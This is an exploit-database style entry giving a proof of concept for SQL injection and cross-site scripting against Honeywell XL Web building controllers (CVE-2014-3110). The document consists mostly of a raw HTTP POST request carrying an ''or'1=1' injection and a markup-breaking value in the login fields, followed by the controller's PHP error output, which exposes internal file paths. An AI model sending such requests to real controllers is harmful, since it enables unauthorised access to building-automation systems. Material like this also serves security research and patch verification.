Notice: Undefined index: HeadTitle in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 300

# Exploit Title: Honeywell XL Web Controller SQLi & XSS # Date: 2018-05-24 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.honeywell.com # Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O, XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL. # Tested on: Linux # CVE: CVE-2014-3110 --------------- ---> Proof Of Concept <-------------------------- POST /standard/mainframe.php HTTP/1.1 Cache-Control: no-cache Referer: http://TargetIP/standard/mainframe.php Accept: text/xml,application/xml,application/xhtml+xml,text/ html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 Accept-Language: en-us,en;q=0.5 Cookie: Locale=1033 Accept-Encoding: gzip, deflate Content-Length: 222 Content-Type: application/x-www-form-urlencoded SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/>
Warning: xw_get_users() expects parameter 1 to be long, string given in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 97

Warning: xml_load_texts_file() expects parameter 2 to be long, string given in /mnt/mtd6/xlweb/web/standard/include/elements.php on line 247
 Notice: Undefined index: HeadTitle in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 300

AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.
Notice: Undefined index: Title in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 509

Notice: Undefined index: Login in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 596

Notice: Undefined index: AltTitle in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 597

Notice: Undefined index: Controller in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 605 :
Notice: Undefined index: UserName in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 632 :
Notice: Undefined index: Password in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 689 :
Notice: Undefined index: RememberMeCheckbox in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 720

Notice: Undefined index: LoginButton in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 750

Notice: Undefined index: AltTitle in /mnt/mtd6/xlweb/web/ standard/login/loginpage.php on line 751